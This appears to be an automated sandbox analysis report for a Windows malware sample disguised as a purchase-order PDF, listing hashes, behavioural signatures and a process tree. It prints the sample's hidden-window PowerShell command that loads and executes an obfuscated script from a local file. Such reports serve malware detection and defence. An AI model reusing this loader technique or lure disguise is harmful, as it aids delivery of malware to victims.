Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
17-08-2024 14:13
Static task
static1
Behavioral task
behavioral1
Sample
PURCHASE ORDER 03.05.2024.PDF.exe
Resource
win7-20240729-en
General
-
Target
PURCHASE ORDER 03.05.2024.PDF.exe
-
Size
626KB
-
MD5
9be2bb8f46192a7cf7006587c0e95d54
-
SHA1
9e31f25cd0c0cf37a92a61ebd87293b519da5534
-
SHA256
4c614a69aebe97562d09c05c5b08db70ba7cba08f6698e5a87fc85407e2fb940
-
SHA512
76140dd7bcfdb778b70c4864934016b9cbc60b4f36ece6aa671c6556f1504d38e3428102663c47ffa8346e2201078a28443a0b42be0c6b7e820f6823cab4810b
-
SSDEEP
12288:naxvaBAHu5sn0ulSRNQeILTPNRLZi8s7exFe2WM:a9aBAObRNVI/PNxzxFMM
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 812 powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\albocarbon.ile PURCHASE ORDER 03.05.2024.PDF.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3296 812 WerFault.exe 90 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PURCHASE ORDER 03.05.2024.PDF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 812 powershell.exe 812 powershell.exe 812 powershell.exe 812 powershell.exe 812 powershell.exe 812 powershell.exe 812 powershell.exe 812 powershell.exe 812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 812 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4680 wrote to memory of 812 4680 PURCHASE ORDER 03.05.2024.PDF.exe 90 PID 4680 wrote to memory of 812 4680 PURCHASE ORDER 03.05.2024.PDF.exe 90 PID 4680 wrote to memory of 812 4680 PURCHASE ORDER 03.05.2024.PDF.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER 03.05.2024.PDF.exe"C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER 03.05.2024.PDF.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Afmatningens=Get-Content 'C:\Users\Admin\AppData\Local\Outlaughing235\ephemeric\Antipatheticalness\Anskaffet.Sys';$Unsucculent=$Afmatningens.SubString(619,3);.$Unsucculent($Afmatningens)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 27323⤵
- Program crash
PID:3296
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 812 -ip 8121⤵PID:4400
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
52KB
MD5d9a344e48210c5d555312be94347270a
SHA18e1957cb5f8e181411781bca9fa72f57e8d0d2b1
SHA256e31954e86c5fadd5da5409be4c6266ac0740652f25073eb29f87d6727d0668b6
SHA512ed1c9a1ce86f20c3eb860079067a7476b8e543c212b0fccd1e73183b6535dec74f34ece8b0225f10fd2f211af68bac6d7302c3b91e1a88d30285ad202854d853
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82